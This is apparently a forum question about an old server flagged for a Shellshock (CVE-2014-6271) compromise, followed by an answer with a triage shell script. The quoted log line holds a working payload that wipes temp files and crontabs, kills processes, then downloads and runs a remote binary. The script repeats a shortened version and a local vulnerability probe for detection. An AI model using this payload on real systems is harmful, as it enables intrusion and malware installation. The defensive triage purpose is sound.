What should you do on an old server if you get a warning like this?
From: chopper boy <[email protected]>
Date: 2015-04-29 9:55 GMT+02:00
Subject: Compromised server / Exploit attempts
To: [email protected]
Compromised server / Exploit attempts
Exploit attempts via bash variable push. Downloads bash script which
installs backdoor Trojan.Hacktool.Linux.Bf.E and starts additional exploit
scans against other servers.
Compromised server:
5.135.167.145
xxx.xxx.xxx.xxx (IP of my server)
Exploit bash scripts:
http://xxx.xxx.xxx.xxx/i.gif
http://xxx.xxx.xxx.xxx/nynew54.gif
Exploit scans address lists:
http://198.27.67.24/news/<xxx>
http://198.27.67.24/download/<xxx>
5.135.167.145 - - [28/Apr/2015:14:45:57 -0700] "GET HTTP/1.1 HTTP/1.1" 400
304 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type:
text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf
/tmp/* ; rm -rf /var/tmp/* ; crontab -r ; killall -9 wget curl lwp-download
b f r xx y i.gif print start pscan pnscan ps ; wget
http://xxx.xxx.xxx.xxx/i.gif ; curl -O http://xxx.xxx.xxx.xxx/i.gif ; chmod +x
i.gif ; nohup ./i.gif &
\");'"
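The User-Agent in that log line starts with `() { :;};`, which is the Shellshock trigger (CVE-2014-6271): a vulnerable bash parses the exported CGI variable as a function definition and then runs whatever follows the closing brace. Two things are worth checking right away on the old server: whether the access logs carry more of these requests, and whether the installed bash still executes trailing code from an environment variable. The script below is an added example written for this thread, not code from the poster, from the e-mail, or from the malware it describes. The log lines in it are constructed (one mirrors the request above; the `xxx` host and the `203.0.113.x` clients are placeholders), and the function names are my own.

```shell
#!/bin/sh
# Added example: triage for a suspected Shellshock hit.
#  1. shellshock_hits / shellshock_count / shellshock_sources scan access-log
#     text for the "() {" function-definition prefix.
#  2. bash_is_vulnerable runs the classic CVE-2014-6271 probe against the
#     local bash.
# SAMPLE_LOG is constructed for this example; the second line mirrors the
# request quoted in the e-mail, with the payload shortened.

SAMPLE_LOG='203.0.113.5 - - [28/Apr/2015:14:45:10 -0700] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
5.135.167.145 - - [28/Apr/2015:14:45:57 -0700] "GET HTTP/1.1 HTTP/1.1" 400 304 "-" "() { :;};/usr/bin/perl -e '"'"'print \"XSUCCESS!\";system(\"wget http://xxx.xxx.xxx.xxx/i.gif\")'"'"'"
203.0.113.7 - - [28/Apr/2015:14:46:02 -0700] "GET /cgi-bin/status.cgi HTTP/1.1" 200 77 "-" "curl/7.38.0"'

# Shellshock signature: "()" followed by optional spaces and "{". The
# attacker must send exactly this prefix for bash to treat the variable as
# a function, so it is a reliable indicator whatever the payload behind it.
SHELLSHOCK_RE='\(\) *\{'

# shellshock_hits LOGTEXT : print matching lines; exit 0 if any matched.
shellshock_hits() {
    printf '%s\n' "$1" | grep -E "$SHELLSHOCK_RE"
}

# shellshock_count LOGTEXT : number of matching lines (prints 0, not nothing).
shellshock_count() {
    printf '%s\n' "$1" | grep -c -E "$SHELLSHOCK_RE" || true
}

# shellshock_sources LOGTEXT : distinct client IPs that sent the payload.
shellshock_sources() {
    shellshock_hits "$1" | awk '{ print $1 }' | sort -u
}

# bash_is_vulnerable : export a function definition with trailing code and
# start a child bash. A patched bash ignores the "echo vulnerable"; an
# unpatched one runs it while importing the environment.
# Exit 0 = vulnerable, 1 = patched or bash not installed.
bash_is_vulnerable() {
    command -v bash >/dev/null 2>&1 || return 1
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo probe' 2>/dev/null)
    case "$out" in
        *vulnerable*) return 0 ;;
        *)            return 1 ;;
    esac
}

# Stand-alone report on the constructed log and on this machine's bash.
# On a real server replace SAMPLE_LOG with "$(cat /var/log/apache2/access.log)"
# or pipe the log through grep -E "$SHELLSHOCK_RE" directly.
echo "Shellshock attempts in sample log: $(shellshock_count "$SAMPLE_LOG")"
echo "Sources:"
shellshock_sources "$SAMPLE_LOG"
if bash_is_vulnerable; then
    echo "bash: VULNERABLE to CVE-2014-6271 - update bash before anything else"
else
    echo "bash: not vulnerable to the CVE-2014-6271 probe"
fi
```

The scan only tells you who tried; a 400 response, as in the quoted line, means Apache rejected the malformed request line, but the same sender will normally also hit real CGI paths, so check every line from those source IPs, not just the ones carrying the prefix. If `bash_is_vulnerable` reports vulnerable and the server exposes any CGI at all, assume the payload ran and treat the box as compromised rather than merely probed.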